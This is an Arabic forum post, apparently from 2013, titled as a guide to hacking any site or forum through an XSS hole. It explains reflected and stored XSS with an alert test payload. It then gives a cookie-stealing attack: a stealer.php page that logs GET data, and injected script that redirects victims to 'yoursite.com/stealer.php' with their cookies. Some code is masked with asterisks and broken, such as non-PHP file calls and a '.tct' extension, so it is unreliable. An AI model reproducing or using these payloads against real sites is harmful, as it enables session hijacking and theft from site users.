عرض مشاركة واحدة
قديم 08-02-2013, 07:34 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Saad Ghamdi
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

.......... اخترق اي موقع او منتدى مع ثغرة ( xss )


بسم الله الرحمن الرحيم

اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...

ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره

ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :
  • javascript
  • HTML
  • PHP

اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص

كود PHP:
www.infectedsite.com/search.php?q=word 
يكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :

http://www.infectedsite.com/search.php?q=***************("XSS")</script>word

ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )


لماذا يكون الموقع مصابا بثغرة ( xss )

السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :
كود PHP:
 #@$%^,.<> 
وذلك لمنع إدخال الأكواد التالية :
  • javascript
  • HTML
  • PHP

هناك نوعين من ثغرات (xss )


( 1 ) اول نوع وهو النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :


كود PHP:
 ***************("XSS")</script> 
سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

( 2 ) النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث كالتالي :

كود PHP:
http://www.infectedsite.com/search.php?q=***************("XSS")</script>word 
كيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :

كود PHP:
 stealer.php 
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة ( GET ) الكود :

كود:
<?php
 $data=$_GET["c"]
 $f=open("*******.tct","w")
 $f.write($data)
 $f.close()
 ?>

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :

كود PHP:
http://www.infectedsite.com/search.php?q=******************.location("http://ypursite.com/stealer.php?c="+********.******);</script> 
هنا دمجنا السكريبت :

كود PHP:
 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 
هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :

كود:
******** . ******
هنا اذا فتحنا الملف

كود:
http://yoursite.com/*******.txt
ستجد الككيز للمستخدم مكتوبة فيها

اما في الثغرات الدائمة فيكفي ادخال الكود التالي :
كود PHP:
 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 
وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :

كود PHP:
 ********.location 



هذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية



hojvr hd l,ru h, lkj]n lu eyvm ( xss )

التوقيع

Don't let idiots ruin your day

 


التعديل الأخير تم بواسطة Saad Ghamdi ; 08-02-2013 الساعة 07:38 PM.

   

رد مع اقتباس